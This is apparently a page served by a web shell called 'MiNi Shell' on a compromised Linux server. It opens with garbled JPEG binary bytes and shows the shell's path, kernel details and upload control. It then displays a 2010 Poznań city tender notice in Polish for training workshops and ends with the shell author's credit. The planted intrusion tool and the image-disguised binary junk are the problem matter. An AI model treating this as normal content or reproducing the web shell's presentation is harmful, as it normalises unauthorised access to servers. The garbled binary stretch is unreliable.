JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/242700-N-2010.html

<p class="kh_header"><b>Poznań: Organizacja i przeprowadzenie szkoleń</b><br>
<b>Numer ogłoszenia: 242700 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Poznania, Biuro Zamówień Publicznych , Pl. Kolegiacki 17, 61-841 Poznań, woj. wielkopolskie, tel. (061) 878 52 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.city.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie:
Dla części nr 1:
Warsztatów szkoleniowych dla przedsiębiorców
Organizacja i przeprowadzenie cyklu warsztatów szkoleniowych dla przedsiębiorców na temat zasad przygotowywania biznes planu.
Warsztaty szkoleniowe skierowane przede wszystkim do przedsiębiorców (do 20% uczestników warsztatu będą mogły stanowić osoby nie prowadzące działalności gospodarczej). Liczba uczestników jednego warsztatu nie może być mniejsza niż 20 oraz nie większa niż 30 osób w jednej grupie. Planuje się organizację warsztatów o następującej tematyce, w następującej liczbie: 

4  warsztaty szkoleniowe 3-dniowe: Biznes plan. Aspekty praktyczne
-	na jeden dzień szkoleniowy przypadają 3 godziny zegarowe zajęć, dodatkowo 0,5 godziny przeznaczone jest na przerwy.
-	liczba godzin 3-dniowego warsztatu wynosi zatem 9 godzin zegarowych zajęć oraz 1,5 godzin zegarowych przeznaczonych jest na przerwy, tj. łącznie czas trwania całego szkolenia wynosi 10,5 godzin zegarowych,
-	za rekrutację szkoleń odpowiada Wykonawca przy współpracy z Zamawiającym,
-	preferowane są popołudniowe godziny zajęć w dni robocze (tj. od godziny 16:00 do 20:00),
-	zagadnienia, które muszą zostać uwzględnione w programie warsztatów:
	Co to jest biznes plan. Korzyści płynące z prawidłowo przygotowanego biznes planu 
	Struktura biznes planu - krok po kroku - realizacja i walidacja podejmowanych działań
	Działania marketingowe jako element biznes planu
	Plan działania - organizacja firmy 
	Aspekty finansowe biznes planu
	biznes plan a finansowanie przedsięwzięcia
	ocena ryzyka
	budowa sprawozdań finansowych (bilansu, rachunku zysków i strat oraz rachunku przepływów pieniężnych),
	wskaźniki operacyjne i finansowe, ocena opłacalności przedsięwzięcia
	statyczne i dynamiczne metody oceny projektów (PB, DPB, ARR, NPV, IRR)
	Jak czytać wyniki firmy - analiza wskaźników ekonomicznych
	Praktyczne problemy związane z opracowaniem biznes planu - case study
	Jak korzystać z biznes planu. Biznes plan jako narzędzie kontroli. Biznes plan jako podstawa podejmowania decyzji inwestycyjnej. Jak sprzedać biznes plan inwestorom - kluczowe kryteria oceny.

Szczegółowy zakres zamówienia zawiera wzór umowy (Załącznik nr 5A do SIWZ) oraz załącznik nr 1 do umowy 

Dla części nr 2:
Warsztatów szkoleniowych dla promotorów przedsiębiorczości akademickiej
Organizacja i przeprowadzenie 2 szkoleń (w ramach części nr 2) o charakterze warsztatowym dla promotorów przedsiębiorczości akademickiej z zakresu komercjalizacji technologii i innowacyjnych rozwiązań oraz kreatywności w działalności biznesowej.
Odbiorcami szkoleń warsztatowych będą promotorzy przedsiębiorczości akademickiej tzn. osoby realizujące działania w ramach Programu Wpierania Projektów Innowacyjnych realizowanego przez Urząd Miasta Poznania, którego celem jest promocja ośrodków naukowo-badawczych regionu, jako miejsca tworzenia usług i rozwiązań adresowanych do przedsiębiorców.
W każdym ze szkoleń będzie mogło wziąć udział maksymalnie 15 osób. 

Planuje się organizację 2 szkoleń warsztatowych o następującej tematyce:
	1 warsztat szkoleniowy pn: Komercjalizacja technologii i innowacyjnych rozwiązań
	na jeden dzień szkoleniowy przypada 5 godzin zegarowych zajęć oraz dodatkowo 0,5 godziny przeznaczone jest na przerwy. Czas łączny jednego szkolenia wynosi zatem 5,5 godzin zegarowych,
	preferowane czas zajęć w przedziale od godziny 8.00 do godziny 16.00 w dni robocze,
	Wykonawca odpowiedzialny jest za wykonanie analizy oczekiwań uczestników warsztatu w zakresie szczegółowych zagadnień danego warsztatu szkoleniowego,
	cześć teoretyczna warsztatów nie może przekraczać 60% czasu trwania całego warsztatu,
	rekrutacja do warsztatów będzie należała wyłącznie do Zamawiającego,
	wykonawca odpowiedzialny jest za wystawienie zaświadczeń uczestnictwa w  warsztacie dla wszystkich uczestników,
	zagadnienia, które muszą zostać uwzględnione w programie warsztatu:
	Znaczenie strategii komercjalizacji w kontekście strategii biznesowych
	Wycena technologii, patentu, umów licencyjnych
	Zagadnienia wyceny wartości niematerialnych i prawnych
	Metody wyceny technologii wraz z praktycznymi przykładami
	Zasady doboru metody wyceny
	Narzędzia marketingowe w procesie komercjalizacji nowych technologii
	Znaczenie wyceny w procesie komercjalizacji
	Rola inwestorów jako jednego z czynników warunkujących sukces nowego przedsięwzięcia
	Ocena rynkowego potencjału innowacyjnych przedsięwzięć


	1 warsztat szkoleniowy pn: Kreatywność w biznesie
	na jeden dzień szkoleniowy przypada 5 godzin zegarowych zajęć oraz dodatkowo 0,5 godziny przeznaczone jest na przerwy. Czas łączny jednego szkolenia wynosi zatem 5,5 godzin zegarowych
	preferowany czas zajęć w przedziale od godziny 8.00 do godziny 16.00 w dni robocze
	Wykonawca odpowiedzialny jest za wykonanie analizy oczekiwań uczestników warsztatu w zakresie szczegółowych zagadnień danego warsztatu szkoleniowego
	cześć teoretyczna warsztatów nie może przekraczać 30% czasu trwania całego warsztatu
	rekrutacja do warsztatów będzie należała wyłącznie do Zamawiającego
	wykonawca odpowiedzialny jest za wystawienie zaświadczeń uczestnictwa w warsztacie dla wszystkich uczestników 
	zagadnienia, które muszą zostać uwzględnione w programie warsztatu:
	Na czym polega twórcze myślenie - cechy osób twórczych
	Model procesu twórczego
	Stwarzanie warunków do twórczego myślenia - Budowanie klimatu i motywacji do pracy kreatywnej
	Komunikacja jako element budowania kreatywnego klimatu
	Metody twórczego rozwiązywania problemów
	Techniki pracy kreatywnej (Burza mózgów, Lista Osborna, Mind-Mapping, Metoda Sześciu Kapeluszy de Bono, Tabela morfologiczna)
	Kreatywność w pracy grupowej
	Stereotypowe myślenie jako bariera ograniczająca zdolności poznawcze - środki zaradcze
	Bariery blokujące kreatywność indywidualną i organizacyjną (m.in. wpływ stresu na kreatywność)


Szczegółowy zakres zamówienia zawiera wzór umowy (Załącznik nr 5B do SIWZ) oraz załącznik nr 1 do umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr 1:
Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zorganizował minimum 5 szkoleń o tematyce ekonomiczno-biznesowej dla przedsiębiorców</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr 1: 
dysponowania minimum 2 osobami, z których każda:
	posiada praktyczne doświadczenie w prowadzeniu szkoleń o tematyce biznesowej skierowanych do przedsiębiorców;
	minimum 2 przeprowadzone szkolenia z zakresu sporządzenia biznes planu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
	legitymuje się co najmniej wykształceniem wyższym magisterskim;
	posiada doświadczenie w przygotowywaniu biznes planów lub analiz finansowych dla firm;
	przygotowane minimum 2 biznes plany lub analizy finansowe w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
Dla części nr 2: 
dysponowania minimum 1 osobą, która:
	posiada doświadczenie w prowadzeniu szkoleń z zakresu komercjalizacji technologii i/lub wyceny technologii i/lub wyceny wartości niematerialnych i prawnych;
	minimum 3 przeprowadzone szkolenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
	posiada praktyczne doświadczenie w przygotowaniu wycen ekonomicznych na rzecz praktyki gospodarczej;
	przygotowanych minimum 5 wycen wartości niematerialnych i prawnych na rzecz przedsiębiorstw, w tym minimum 2 wyceny technologii w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
	legitymuje się co najmniej wykształceniem wyższym magisterskim;

dysponowania minimum 1 osobą, która:
	posiada doświadczenie w prowadzeniu szkoleń z zakresu kreatywności i twórczości;
	minimum 2 przeprowadzone szkolenia z zakresu kreatywności lub/i twórczości w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
	legitymuje się wykształceniem wyższym kierunkowym o profilu społecznym lub ekonomicznym ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3)	Program szkoleń (dotyczy obu części):
Wymaga się przygotowania programu szkolenia, który będzie zawierał szczegółowe informacje o merytorycznym zakresie szkoleń, wraz z informacjami o czasie przeznaczonym na poszczególne pozycje.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http;//bip.city.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pok. 443.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 11:45, miejsce: Urząd Miasta Poznania, Biuro Zamówień Publicznych, plac Kolegiacki 17, 61-841 Poznań, pokój 446.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty szkoleniowe dla przedsiębiorców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie cyklu warsztatów szkoleniowych dla przedsiębiorców na temat zasad przygotowywania biznes planu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztaty szkoleniowe dla promotorów przedsiębiorczości akademickiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie 2 szkoleń (w ramach części nr 2) o charakterze warsztatowym dla promotorów przedsiębiorczości akademickiej z zakresu komercjalizacji technologii i innowacyjnych rozwiązań oraz kreatywności w działalności biznesowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com